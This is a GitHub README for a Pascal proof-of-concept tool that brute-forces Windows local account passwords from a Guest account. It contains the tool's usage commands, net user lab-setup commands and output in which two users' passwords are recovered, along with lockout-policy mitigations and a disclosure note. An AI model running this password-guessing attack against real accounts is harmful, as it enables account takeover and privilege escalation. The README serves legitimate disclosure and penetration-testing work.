
Crack any Microsoft Windows users password without any privilege (Guest account included)

Primary LanguagePascal

Notice 1: We are excited to announce that our current tool has been ported to a PowerShell version. This means that users can now access and use the tool directly from the PowerShell command line, making it even more convenient and efficient to use. We believe that this new version will greatly benefit our users and enhance their experience with the tool. Thank you for your continued support and we hope you enjoy the new PowerShell version: https://github.com/DarkCoderSc/power-brute-logon

Notice 2: We have recently learned that Microsoft has enabled the account lockdown policy by default in modern and up-to-date versions of Windows. This policy helps to secure the system by locking an account after a certain number of failed login attempts. While this is a beneficial security measure, it renders the proof-of-concept (PoC) inefficient on these systems.

Win Brute Logon (Proof Of Concept)

Release date: 2020-05-14

Target: Windows XP to Latest Windows 10 Version (1909)


Weakness location : LogonUserA, LogonUserW, CreateProcessWithLogonA, CreateProcessWithLogonW


Wordlist File

WinBruteLogon.exe -u <username> -w <wordlist_file>

Stdin Wordlist

type <wordlist_file> | WinBruteLogon.exe -u <username> -


Win Brute Logon is designed to simulate a brute-force attack on a Microsoft account by guessing large numbers of password combinations in a short amount of time. This allows pentesters to test the security posture of their systems and assess their defenses against brute-force attacks. The tool exploits the lack of an account lockout mechanism, which is a common weakness in many systems (before account lockout becomes enabled by default on Windows 11). By attempting to guess the password of an account, the tool can help pentesters identify and address vulnerabilities in their security measures. It should be used responsibly and within the bounds of the law.

PoC Test Scenario (With a Guest Account)

For this demonstration, we will set up a fresh version of Windows 10 on a virtual or physical machine. Once the machine is set up, log in as an administrator. Next, create two different local accounts: one administrator account and one regular user account. Please note that although we will be using the guest account for the demo, this proof-of-concept (PoC) is not limited to the guest account. It can be used from any account or group, including guest, regular user, and admin user.

Create a new admin user

net user darkcodersc /add

net user darkcodersc trousers (trousers is the password)

net localgroup administrators darkcodersc /add

Create a regular user

net user HackMe /add

net user HackMe ozlq6qwm (ozlq6qwm is the password)

Create a new Guest account

net user GuestUser /add

net localgroup users GuestUser /delete

net localgroup guests GuestUser /add

Get a Wordlist

In my case both trousers and ozlq6qwm are in SecList : https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/10k-most-common.txt

Start the attack

To begin the demonstration, log off from the administrator account or restart the machine and log in to the guest account. Then, place the PoC executable in a location where you have access as a guest user.

Usage : WinBruteLogon.exe -v -u <username> -w <wordlist_file>

-v is optional, it design the verbose mode.

By default, domain name is the value designated by %USERDOMAIN% env var. You can specify a custom name with option -d

Crack First User : darkcodersc (Administrator)

prompt(guest)>WinBruteLogon.exe -v -u darkcodersc -w 10k-most-common.txt

Wait few seconds to see the following result:

[ .. ] Load 10k-most-common.txt file in memory...
[DONE] 10002 passwords successfully loaded.
[INFO] 2 cores are available
[ .. ] Create 2 threads...
[INFO] New "TWorker" Thread created with id=2260, handle=364
[INFO] New "TWorker" Thread created with id=3712, handle=532
[DONE] Done.
[ OK ] Password for username=[darkcodersc] and domain=[DESKTOP-0885FP1] found = [trousers]
[ .. ] Finalize and close worker threads...
[INFO] "TWorkers"(id=2260, handle=364) Thread successfully terminated.
[INFO] "TWorkers"(id=3712, handle=532) Thread successfully terminated.
[DONE] Done.
[INFO] Ellapsed Time : 00:00:06

Crack Second User : HackMe (Regular User)

prompt(guest)>WinBruteLogon.exe -v -u HackMe -w 10k-most-common.txt

Wait few seconds to see the following result:

[ .. ] Load 10k-most-common.txt file in memory...
[DONE] 10002 passwords successfully loaded.
[INFO] 2 cores are available
[ .. ] Create 2 threads...
[INFO] New "TWorker" Thread created with id=5748, handle=336
[INFO] New "TWorker" Thread created with id=4948, handle=140
[DONE] Done.
[ OK ] Password for username=[HackMe] and domain=[DESKTOP-0885FP1] found = [ozlq6qwm]
[ .. ] Finalize and close worker threads...
[INFO] "TWorkers"(id=5748, handle=336) Thread successfully terminated.
[INFO] "TWorkers"(id=4948, handle=140) Thread successfully terminated.
[DONE] Done.
[INFO] Ellapsed Time : 00:00:06

Real world scenario

"In a real-world scenario, if an attacker gains access to a low-privileged user account, they may be able to crack the password of a more privileged user and escalate their privileges. To mitigate this risk, there are a few steps that can be taken:

  • If present, disable any guest accounts.
  • Implement application white-listing to restrict the execution of unauthorized software.
  • Follow guidelines for creating and maintaining strong passwords for all users.

To implement a security lockout policy (which is not enabled by default), follow these steps:

  • Open the 'secpol.msc' utility.
  • Navigate to 'Account Policies' > 'Account Lockout Policy'
  • Edit the 'Account lockout threshold' value with a desired number of attempts (from 1 to 999). This value represents the number of failed login attempts before the account is locked.

Please note that the lockout policy does not apply to the administrator account. In this case, the best protection for the administrator account (if enabled) is to set up a very complex password.

A report detailing this weakness has been sent to the Microsoft Security Team. They should consider enabling the account lockout policy by default."

(UPDATE 2022) : Account lockout finally enabled by default.


🇺🇸 All source code and projects shared on this Github account by Jean-Pierre LESUEUR and his company, PHROZEN SAS, are provided "as is" without warranty of any kind, either expressed or implied. The user of this code assumes all responsibility for any issues or legal liabilities that may arise from the use, misuse, or distribution of this code. The user of this code also agrees to release Jean-Pierre LESUEUR and PHROZEN SAS from any and all liability for any damages or losses that may result from the use, misuse, or distribution of this code.

By using this code, the user agrees to indemnify and hold Jean-Pierre LESUEUR and PHROZEN SAS harmless from any and all claims, liabilities, costs, and expenses arising from the use, misuse, or distribution of this code. The user also agrees not to hold Jean-Pierre LESUEUR or PHROZEN SAS responsible for any errors or omissions in the code, and to take full responsibility for ensuring that the code meets the user's needs.

This disclaimer is subject to change without notice, and the user is responsible for checking for updates. If the user does not agree to the terms of this disclaimer, they should not use this code.

🇫🇷 Tout les codes sources et les projets partagés sur ce compte Github par Jean-Pierre LESUEUR et sa société, PHROZEN SAS, sont fournis "tels quels" sans aucune garantie, expresse ou implicite. L'utilisateur de ce code assume toute responsabilité pour les problèmes ou les responsabilités juridiques qui pourraient résulter de l'utilisation, de l'utilisation abusive ou de la diffusion de ce code. L'utilisateur de ce code accepte également de libérer Jean-Pierre LESUEUR et PHROZEN SAS de toute responsabilité pour tous dommages ou pertes pouvant résulter de l'utilisation, de l'utilisation abusive ou de la diffusion de ce code.

En utilisant ce code, l'utilisateur accepte de garantir et de dégager Jean-Pierre LESUEUR et PHROZEN SAS de toutes réclamations, responsabilités, coûts et dépenses résultant de l'utilisation, de l'utilisation abusive ou de la diffusion de ce code. L'utilisateur accepte également de ne pas tenir Jean-Pierre LESUEUR ou PHROZEN SAS responsable des erreurs ou omissions dans le code et de prendre l'entière responsabilité de s'assurer que le code répond aux besoins de l'utilisateur.

Cette clause de non-responsabilité est sujette à modification sans préavis et l'utilisateur est responsable de vérifier les mises à jour. Si l'utilisateur n'accepte pas les termes de cette clause de non-responsabilité, il ne doit pas utiliser ce code.